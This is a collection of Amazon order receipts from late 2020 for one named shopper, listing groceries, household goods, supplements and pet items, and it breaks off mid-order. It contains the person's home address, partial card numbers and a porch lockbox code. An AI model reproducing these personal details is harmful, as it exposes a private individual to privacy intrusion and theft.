Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $0.00 Gift Card Shipping & Handling: $0.00 Billing address Total before tax: $0.00Brian J Coady Estimated tax to be collected: $0.00 1454 Monroe St. NW Washington, DC 20010 Grand Total:$0.00 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-7339578-5594614 Order Placed: December 7, 2020 Amazon.com order number: 114-7339578-5594614 Order Total: $60.87 Shipped on December 7, 2020 Items Ordered 1 of: 365 Everyday Value, Organic Almonds, Roasted & Salted, 10 oz Sold by: Whole Foods Market (seller profile) Price $7.99 Condition: New 1 of: Gts Living Foods, Kombucha Pomegranate Power Organic, 16 Fl Oz Sold by: Whole Foods Market (seller profile) $2.36 Condition: New 1 of: Cabot Seriously Sharp Cheddar Cheese, 8 oz Sold by: Whole Foods Market (seller profile) $3.99 Condition: New 1.12 lb of: Dip Guacamole Conventional Sold by: Whole Foods Market (seller profile) ($4.89/lb $5.48 Condition: New 1 of: 365 Everyday Value, Spring Water, 128 fl oz Sold by: Whole Foods Market (seller profile) $0.89 Condition: New 2.15 lb of: Pork Sausage Link Italian Mild Step 1 Sold by: Whole Foods Market (seller profile) ($6.99/lb $15.03 Condition: New 1 of: Rhythm Superfoods Organic Kale Chips, Original, 2 oz, Packaging May Vary Sold by: Whole Foods Market (seller profile) $4.69 Condition: New 2 of: PUR 100% Xylitol Chewing Gum, Spearmint -Sugar-Free + Aspartame Free, Vegan + non GMO, 55 Count (Pack of 1) Sold by: Whole Foods Market (seller profile) $3.14 Condition: New 3 of: 365 by Whole Foods Market, Cheese Bar, Sharp Cheddar, 8 Ounce Sold by: Whole Foods Market (seller profile) $2.99 Condition: New Shipping Address: Print this page for your records. Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: Scheduled delivery Payment information Payment Method: Item(s) Subtotal: $55.68 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $55.68Brian J Coady Estimated tax to be collected: $0.191454 Monroe St. NW Washington, DC 20010 Tip (optional): 5.00United States Grand Total:$60.87 Credit Card transactions AmazonPLCC ending in 3157: December 9, 2020: $5.00 AmazonPLCC ending in 3157: December 7, 2020:$55.87 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-4092722-1933825 Order Placed: December 7, 2020 Amazon.com order number: 114-4092722-1933825 Order Total: $15.85 Shipped on December 8, 2020 Items Ordered Price 1 of: Manchester Mothmen Moth Traps Closet Clothing & Pantry Moth Trap | 2 in 1 Moth Killer for Closets & Kitchen | Moth Repellant for Clothes & Food | 5Sold by: Invictus Brands (seller profile) $14.95 Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $14.95 Visa | Last digits: 0222 Shipping & Handling: $0.00 Billing address Total before tax: $14.95Brian J Coady Estimated tax to be collected: $0.901454 Monroe St. NW Washington, DC 20010 Grand Total:$15.85 United States Credit Card transactions Visa ending in 0222: December 8, 2020:$15.85 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-1248405-4720218 Subscribe and Save Order Placed: December 7, 2020 Amazon.com order number: 114-1248405-4720218 Order Total: $16.93 This order contains Subscribe & Save items. Shipped on December 10, 2020 Items Ordered Price 1 of: Dr. Killigan's Premium Pantry Moth Traps with Pheromones Prime | Safe, Non-Toxic with No Insecticides | Sticky Glue Trap for Food and Cupboard Moths i Sold by: Dr. Killigan's (seller profile) $15.97 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $15.97 Visa | Last digits: 0222 Shipping & Handling: $0.00 Gift Card Total before tax: $15.97Billing address Estimated tax to be collected: $0.96Brian J Coady 1454 Monroe St. NW Grand Total:$16.93 Washington, DC 20010 United States Credit Card transactions Visa ending in 0222: December 10, 2020:$16.93 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-9549207-2739414 Subscribe and Save Order Placed: December 8, 2020 Amazon.com order number: 111-9549207-2739414 Order Total: $14.20 This order contains Subscribe & Save items. Shipped on December 26, 2020 Items Ordered Price 1 of: TEMPTATIONS Classic Crunchy and Soft Cat Treats Tasty Chicken Flavor, 30 Oz. $15.78 Tub Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $15.78 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$1.58 Billing address Total before tax: $14.20Brian J Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$14.20 United States Credit Card transactions AmazonPLCC ending in 3157: December 26, 2020:$14.20 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-7234166-2391465 Subscribe and Save Order Placed: December 8, 2020 Amazon.com order number: 111-7234166-2391465 Order Total: $26.15 This order contains Subscribe & Save items. Shipped on December 26, 2020 Items Ordered Price 1 of: Amazon Brand -Solimo Red Energy Drink, Sugar Free, 16 Fluid Ounce (Pack of 24) Sold by: Amazon.com Services LLC $28.48 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $28.48 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$4.27 Billing address Total before tax: $24.21Brian J Coady Estimated tax to be collected: $1.941454 Monroe St. NW Washington, DC 20010 Grand Total:$26.15 United States Credit Card transactions AmazonPLCC ending in 3157: December 26, 2020:$26.15 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-3998592-4393016 Subscribe and Save Order Placed: December 9, 2020 Amazon.com order number: 111-3998592-4393016 Order Total: $32.28 This order contains Subscribe & Save items. Shipped on December 26, 2020 Items Ordered Price 1 of: New Chapter Calcium Supplement -Bone Strength Whole Food Calcium with Vitamin K2 + D3 + Magnesium, Vegetarian, Gluten Free 120 count (40 day supply) Sold by: Amazon.com Services LLC $37.98 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $37.98 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$5.70 Billing address Total before tax: $32.28Brian J Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$32.28 United States Credit Card transactions AmazonPLCC ending in 3157: December 26, 2020:$32.28 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-3709747-5044206 Subscribe and Save Order Placed: December 9, 2020 Amazon.com order number: 111-3709747-5044206 Order Total: $44.10 This order contains Subscribe & Save items. Shipped on December 26, 2020 Items Ordered Price 1 of: Plasticplace Contractor Trash Bags 55-60 Gallon │ 6.0 Mil │ Black Heavy Duty Garbage Bag │ 36" x 58" (20 Count) (CON55X620A) Sold by: Amazon.com Services LLC $43.79 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $43.79 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$2.19 Billing address Total before tax: $41.60Brian J Coady Estimated tax to be collected: $2.501454 Monroe St. NW Washington, DC 20010 Grand Total:$44.10 United States Credit Card transactions AmazonPLCC ending in 3157: December 26, 2020:$44.10 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-2938002-8639426 Subscribe and Save Order Placed: December 9, 2020 Amazon.com order number: 114-2938002-8639426 Order Total: $13.16 This order contains Subscribe & Save items. Shipped on December 26, 2020 Items Ordered Price 1 of: Doctor's Best High Absorption CoQ10 with BioPerine, Gluten Free, Naturally Fermented, Heart Health, Energy Production,100 mg 120 Softgels Sold by: Amazon.com Services LLC $16.45 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $16.45 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$3.29 Billing address Total before tax: $13.16Brian J Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$13.16 United States Credit Card transactions AmazonPLCC ending in 3157: December 26, 2020:$13.16 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-4858055-2205859 Order Placed: November 27, 2020 Amazon.com order number: 114-4858055-2205859 Order Total: $12.56 Shipped on November 28, 2020 Items Ordered 2 of: Prestone AS658 Deluxe 3-in-1 Windshield Washer Fluid, 1 Gallon Sold by: Amazon.com Services LLC Price $5.92 Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $11.84 Visa | Last digits: 0222 Shipping & Handling: $0.00 Billing address Total before tax: $11.84 Brian J Coady Estimated tax to be collected: $0.721454 Monroe St. NW Washington, DC 20010 Grand Total:$12.56 United States Credit Card transactions Visa ending in 0222: November 28, 2020:$12.56 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-2439948-4640263 Order Placed: November 25, 2020 Amazon.com order number: 114-2439948-4640263 Order Total: $157.91 Shipped on November 25, 2020 Items Ordered 1 of: Paddywax, Candle Cedar Pomegranate Merlot Footed Ribbed Glass Sold by: Whole Foods Market (seller profile) Price $13.99 Condition: New 4 of: TILLAMOOK Extra Sharp Cheddar Bar, 8 OZ Sold by: Whole Foods Market (seller profile) $4.49 Condition: New 2 of: Fox Ledge Spring Water, Water Distilled, 128 Ounce Sold by: Whole Foods Market (seller profile) $1.49 Condition: New 1 of: Whole Foods Market, Cream of Mushroom Soup, 24 Ounce Sold by: Whole Foods Market (seller profile) $5.39 Condition: New 3.17 lb of: Pork Sausage Link Italian Spicy Step 1 Sold by: Whole Foods Market (seller profile) ($3.59/lb $11.38 Condition: New 2 of: 365 by Whole Foods Market, Cheese Bar, Sharp Cheddar, 8 Ounce Sold by: Whole Foods Market (seller profile) $2.99 Condition: New 1 of: WORLD CENTRIC UTENSIL CORN STARCH ASRTD Sold by: Whole Foods Market (seller profile) $3.19 Condition: New 1 of: Repurpose, Repurpose Eco-To-Go Cups Set 12 Ounce, 12 Count Sold by: Whole Foods Market (seller profile) $5.29 Condition: New 1 of: Repurpose, Repurpose Assorted Eco-Cutlery, 24 Count Sold by: Whole Foods Market (seller profile) $3.19 Condition: New 1 of: Herb Crusted Rotisserie Chicken, Chilled Sold by: Whole Foods Market (seller profile) $7.99 Condition: New Print this page for your records. 1 of: GT's Kombucha, Gingerberry 16 Fl Oz Sold by: Whole Foods Market (seller profile) $3.49 Condition: New 1 of: World Centric Wheat Straw/Bagasse Compostable 6-Inch Fiber Ripple Edge Plate, 20-Piece Sold by: Whole Foods Market (seller profile) $1.59 Condition: New 1 of: Paddywax, Candle Merry Everything Vanilla Bean Myrrh Glass 7 Sold by: Whole Foods Market (seller profile) $10.49 Condition: New 2 of: Repurpose 100% Compostable Plant Based Clear Cold Cup | 12 Ounce Party Cups | 20 Cups … Sold by: Whole Foods Market (seller profile) $4.19 Condition: New 3 of: 365 Everyday Value, Blueberries, 12 oz, (Frozen) Sold by: Whole Foods Market (seller profile) $2.99 Condition: New 1 of: Pasta Salad Asian Noodle Bam Fresh Pack, 24 Ounce Sold by: Whole Foods Market (seller profile) $7.99 Condition: New 1 of: Repurpose, Plates Compostable 9 Inch, 20 Count Sold by: Whole Foods Market (seller profile) $4.19 Condition: New 2.06 lb of: Cherry Conventional, 1 Bag Sold by: Whole Foods Market (seller profile) ($7.99/lb $16.46 Condition: New 1 of: Paddywax, Candle Balsalm Fir Ribbed Mercury Glass Green 4.5 Ounce Sold by: Whole Foods Market (seller profile) $10.49 Condition: New 1 of: 365 Everyday Value, Dark Sweet Cherries, 16 oz, (Frozen) Sold by: Whole Foods Market (seller profile) $4.69 Condition: New Shipping Address: Whole Foods Market -Silver Spring Map 833 Wayne Ave Silver Spring, MD 20910-4427 United States Recipient for Pick-Up: Brian J. Coady Shipping Speed: Payment information Payment Method: Amazon.com Store Card | Last digits: 3157 Item(s) Subtotal: $154.08 Shipping & Handling: $0.00 ---- Billing address Brian J Coady 1454 Monroe St. NW Total before tax: $154.08 Estimated tax to be collected: $3.83 ---- Washington, DC 20010 Grand Total:$157.91 United States Credit Card transactions AmazonPLCC ending in 3157: November 25, 2020:$157.91 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-5079944-3900246 Order Placed: December 1, 2020 Amazon.com order number: 114-5079944-3900246 Order Total: $36.96 Shipped on December 2, 2020 Items Ordered 1 of: Schick Hydro Sense Hydrate Mens Razor Blade Refill With Skin Guards, Includes 12 Razor Blades Refills Sold by: Amazon.com Services LLC Price $26.88 Condition: New 1 of: Face Mask, Pack of 50 -Blue Sold by: Amazon.com Services LLC $7.99 Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $34.87 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $34.87Brian J Coady Estimated tax to be collected: $2.091454 Monroe St. NW Washington, DC 20010 Grand Total:$36.96 United States Credit Card transactions AmazonPLCC ending in 3157: December 2, 2020:$36.96 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-5500268-6817867 Order Placed: December 3, 2020 Amazon.com order number: 114-5500268-6817867 Order Total: $133.38 Shipped on December 3, 2020 Items Ordered 1 of: Macro Organic, Noodles Spinach, 12 Ounce Sold by: Whole Foods Market (seller profile) Price $6.99 Condition: New 1 of: Sustainably Yours, Cat Litter Multi Cat Plus, 208 Ounce Sold by: Whole Foods Market (seller profile) $19.99 Condition: New 2 of: Tasty Bite Spinach Dal Indian Entree, 10 oz Sold by: Whole Foods Market (seller profile) $3.69 Condition: New 1 of: PUR 100% Xylitol Chewing Gum, Spearmint -Sugar-Free + Aspartame Free, Vegan + non GMO, 55 Count (Pack of 1) Sold by: Whole Foods Market (seller profile) $3.14 Condition: New 1 of: Repurpose, Repurpose Eco-To-Go Cups Set 12 Ounce, 12 Count Sold by: Whole Foods Market (seller profile) $5.29 Condition: New 2 of: Wymans Of Maine, Blueberries Wild, 48 Ounce Sold by: Whole Foods Market (seller profile) $14.99 Condition: New 2.97 lb of: Chicken Thigh Boneless Skinless Air Chilled Tray Pack Step 2 Sold by: Whole Foods Market (seller profile) ($4.99/lb $14.82 Condition: New 3 of: Califia Farms -Keto Coffee Creamer, Unsweetened, 16.9 Oz, Almond Milk & Coconut Cream, Low Calorie, Zero Sugar & Carb, 500mg MCT, Non Dairy, Plant Based, Whole30, Shelf Stable Sold by: Whole Foods Market (seller profile) $3.99 Condition: New 1 of: Harrisburg Dairies, Heavy Cream Quart, 32 Fl Oz Sold by: Whole Foods Market (seller profile) $5.49 Condition: New 1 of: GT's Kombucha, Gingerberry 16 Fl Oz $2.36 Print this page for your records. Sold by: Whole Foods Market (seller profile) Condition: New 1.08 lb of: Cherry Rainier Conventional, 1 Bag ($8.49/lb Sold by: Whole Foods Market (seller profile) $9.17 Condition: New 2 of: 365 Everyday Value, Dark Sweet Cherries, 16 oz, (Frozen) $4.69 Sold by: Whole Foods Market (seller profile) Condition: New 1 of: 365 Everyday Value, Romaine Hearts Salad Bag Organic, 12 Ounce $3.49 Sold by: Whole Foods Market (seller profile) Condition: New 1 of: KeVita Master Brew Kombucha, Ginger, with Live Probiotics, 15.2 oz. $2.22 Sold by: Whole Foods Market (seller profile) Condition: New Shipping Address: Whole Foods Market -Silver Spring Map 833 Wayne Ave Silver Spring, MD 20910-4427 United States Recipient for Pick-Up: Brian J. Coady Shipping Speed: Hand delivery and installation Payment information Payment Method: Item(s) Subtotal: $131.67 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $131.67 Brian J Coady Estimated tax to be collected: $1.711454 Monroe St. NW Washington, DC 20010 Grand Total:$133.38 United States Credit Card transactions AmazonPLCC ending in 3157: December 3, 2020:$133.38 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-4112819-3485023 Subscribe and Save Order Placed: December 4, 2020 Amazon.com order number: 114-4112819-3485023 Order Total: $7.40 This order contains Subscribe & Save items. Shipped on December 26, 2020 Items Ordered Price 1 of: Amazon Basic Care Ibuprofen Tablets 200 mg, Pain Reliever/Fever Reducer (NSAID), 500 Count Sold by: Amazon.com Services LLC FSA or HSA eligible $7.79 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $7.79 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Subscribe & Save:-$0.39 Billing address Total before tax: $7.40Brian J Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total: $7.40 United States FSA or HSA eligible FSA or HSA eligible amount (includes taxes & shipping): $7.40 Credit Card transactions AmazonPLCC ending in 3157: December 26, 2020:$7.40 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-2410883-8070614 Subscribe and Save Order Placed: December 4, 2020 Amazon.com order number: 114-2410883-8070614 Order Total: $12.32 This order contains Subscribe & Save items. Shipped on December 26, 2020 Items Ordered Price 1 of: GoodSense Naproxen Sodium Tablets, 220 mg, All Day Pain Reliever and Fever Reducer, Strength to Last 12 Hours, 400 Count Sold by: Amazon.com Services LLC FSA or HSA eligible $14.49 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $14.49 Visa | Last digits: 0222 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$2.17 Billing address Total before tax: $12.32Brian J Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$12.32 United States FSA or HSA eligible FSA or HSA eligible amount (includes taxes & shipping): $12.32 Credit Card transactions Visa ending in 0222: December 26, 2020:$12.32 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-5567403-4373816 Order Placed: November 11, 2020 Amazon.com order number: 111-5567403-4373816 Order Total: $6.46 Shipped on November 12, 2020 Items Ordered Price 1 of: Amazon Basic Care Hydrocortisone 1% Anti-Itch Cream, Plus 10 Moisturizers; Ultra-moisturizing, Maximum Strength Itch Relief, 2 Ounces Sold by: Amazon.com Services LLC FSA or HSA eligible $6.46 Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $6.46 Visa | Last digits: 0222 Shipping & Handling: $0.00 Billing address Total before tax: $6.46Brian J Coady Estimated tax to be collected: $0.00 1454 Monroe St. NW Washington, DC 20010 Grand Total:$6.46 United States FSA or HSA eligible FSA or HSA eligible amount (includes taxes & shipping): $6.46 Credit Card transactions Visa ending in 0222: November 12, 2020:$6.46 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-8531524-1993064 Order Placed: November 11, 2020 Amazon.com order number: 111-8531524-1993064 Order Total: $5.99 Shipped on November 12, 2020 Items Ordered Price 1 of: Hydrocortisone Maximum Strength Cream 1% with Aloe, 3 OZ (Compare to Cortizone-10) (3 x 1 OZ Tubes) Sold by: iTrifecta (seller profile) | Product question? Ask Seller $5.99 Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $5.99 Visa | Last digits: 0222 Shipping & Handling: $0.00 Billing address Total before tax: $5.99Brian J Coady Estimated tax to be collected: $0.00 1454 Monroe St. NW Washington, DC 20010 Grand Total:$5.99 United States Credit Card transactions Visa ending in 0222: November 12, 2020:$5.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-8091308-9128259 Subscribe and Save Order Placed: November 12, 2020 Amazon.com order number: 114-8091308-9128259 Order Total: $4.49 This order contains Subscribe & Save items. Shipped on November 25, 2020 Items Ordered 1 of: Wahl Premium Hair Clipper Blade Lubricating Oil for Clippers, Trimmers & Blade Corrosion for Rust Prevention -4 Fluid Ounces -Model 3310-300 Sold by: Amazon.com Services LLC Price $4.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $4.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Subscribe & Save:-$0.75 Billing address Total before tax: $4.24Brian J Coady Estimated tax to be collected: $0.251454 Monroe St. NW Washington, DC 20010 Grand Total: $4.49 United States Credit Card transactions AmazonPLCC ending in 3157: November 25, 2020:$4.49 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-2408047-4930638 Subscribe and Save Order Placed: November 13, 2020 Amazon.com order number: 113-2408047-4930638 Order Total: $8.86 This order contains Subscribe & Save items. Shipped on November 27, 2020 Items Ordered Price 1 of: Raid Multi Insect Killer, Kills Ants, Spiders, Roaches and Flies, For Indoor and Outdoor use, Orange Breeze, 15 Oz Sold by: Amazon.com Services LLC $9.84 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $9.84 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Subscribe & Save:-$1.48 Billing address Total before tax: $8.36Brian J Coady Estimated tax to be collected: $0.501454 Monroe St. NW Washington, DC 20010 Grand Total: $8.86 United States Credit Card transactions AmazonPLCC ending in 3157: November 27, 2020:$8.86 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-4709954-0245844 Subscribe and Save Order Placed: November 13, 2020 Amazon.com order number: 112-4709954-0245844 Order Total: $14.08 This order contains Subscribe & Save items. Shipped on November 22, 2020 Items Ordered 1 of: Instant Power 1510 Commercial Drain Cleaner, 1-Gallon Sold by: Amazon.com Services LLC Price $13.98 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $13.98 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$0.70 Billing address Total before tax: $13.28Brian J Coady Estimated tax to be collected: $0.801454 Monroe St. NW Washington, DC 20010 Grand Total:$14.08 United States Credit Card transactions AmazonPLCC ending in 3157: November 22, 2020:$14.08 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-2056905-0669828 Subscribe and Save Order Placed: November 13, 2020 Amazon.com order number: 111-2056905-0669828 Order Total: $25.81 This order contains Subscribe & Save items. Shipped on November 25, 2020 Items Ordered Price 1 of: Amazon Brand -Solimo Red Energy Drink, Sugar Free, 16 Fluid Ounce (Pack of 24) Sold by: Amazon.com Services LLC $28.12 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $28.12 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$4.22 Billing address Total before tax: $23.90Brian J Coady Estimated tax to be collected: $1.911454 Monroe St. NW Washington, DC 20010 Grand Total:$25.81 United States Credit Card transactions AmazonPLCC ending in 3157: November 25, 2020:$25.81 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-3600769-0721808 Subscribe and Save Order Placed: November 13, 2020 Amazon.com order number: 111-3600769-0721808 Order Total: $32.29 This order contains Subscribe & Save items. Shipped on November 25, 2020 Items Ordered Price 1 of: New Chapter Calcium Supplement -Bone Strength Whole Food Calcium with Vitamin K2 + D3 + Magnesium, Vegetarian, Gluten Free 120 count (40 day supply) Sold by: Amazon.com Services LLC $37.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $37.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$5.70 Billing address Total before tax: $32.29Brian J Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$32.29 United States Credit Card transactions AmazonPLCC ending in 3157: November 25, 2020:$32.29 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-4795566-7637804 Subscribe and Save Order Placed: November 18, 2020 Amazon.com order number: 114-4795566-7637804 Order Total: $14.93 This order contains Subscribe & Save items. Shipped on November 27, 2020 Items Ordered Price 1 of: TEMPTATIONS Classic Crunchy and Soft Cat Treats Tasty Chicken Flavor, 30 Oz. $15.72 Tub Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $15.72 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$0.79 Billing address Total before tax: $14.93Brian J Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$14.93 United States Credit Card transactions AmazonPLCC ending in 3157: November 27, 2020:$14.93 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-3048252-6749031 Order Placed: November 2, 2020 Amazon.com order number: 114-3048252-6749031 Order Total: $82.42 Shipped on November 2, 2020 Items Ordered 1 of: Kitu Super Coffee, Iced Keto Coffee (0g Added Sugar, 10g Protein, 70 Calories) [Hazelnut] 12 Fl Oz, 1 Pack | Iced Coffee, Protein Coffee, Coffee Drinks -LactoseFree, SoyFree, GlutenFree Sold by: Whole Foods Market (seller profile) Price $2.25 Condition: New 1 of: KeVita Master Brew Kombucha, Ginger, with Live Probiotics, 15.2 oz. Sold by: Whole Foods Market (seller profile) $2.25 Condition: New 1 of: PUR 100% Xylitol Chewing Gum, Spearmint -Sugar-Free + Aspartame Free, Vegan + non GMO, 55 Count (Pack of 1) Sold by: Whole Foods Market (seller profile) $3.99 Condition: New 2 of: Berry Blueberry Organic, 1 Pint Sold by: Whole Foods Market (seller profile) $4.49 Condition: New 1 of: Cabot Seriously Sharp Cheddar Cheese, 8 oz Sold by: Whole Foods Market (seller profile) $2.69 Condition: New 1 of: Epic Bar Beef Bacon Apple, 1.5 oz Sold by: Whole Foods Market (seller profile) $2.25 Condition: New 2 of: Raspberry Red Organic, 6 Ounce Sold by: Whole Foods Market (seller profile) $2.70 Condition: New 1 of: GT's Kombucha, Gingerade 16 Fl Oz Sold by: Whole Foods Market (seller profile) $2.25 Condition: New 3.74 lb of: Bell & Evans, Chicken Whole Fryer Bagged Air Chilled Step 2 Sold by: Whole Foods Market (seller profile) ($1.79/lb $6.69 Condition: New 1 of: Traditional Medicinals Tea, Organic Dandelion Leaf and Root Tea, 16 Bags $5.69 Print this page for your records. Sold by: Whole Foods Market (seller profile) Condition: New 1 of: 4505 Meats, Chicharrones Fried Pork Rinds, Jalapeno Cheddar, 2.5 Ounce Sold by: Whole Foods Market (seller profile) $4.99 Condition: New 1.08 lb of: Beef Ground 80/20 Step 1 Sold by: Whole Foods Market (seller profile) ($3.59/lb $3.88 Condition: New 1 of: 365 Everyday Value, Organic Almonds, Roasted & Salted, 10 oz Sold by: Whole Foods Market (seller profile) $7.99 Condition: New 3 of: 365 Everyday Value, Dark Sweet Cherries, 16 oz, (Frozen) Sold by: Whole 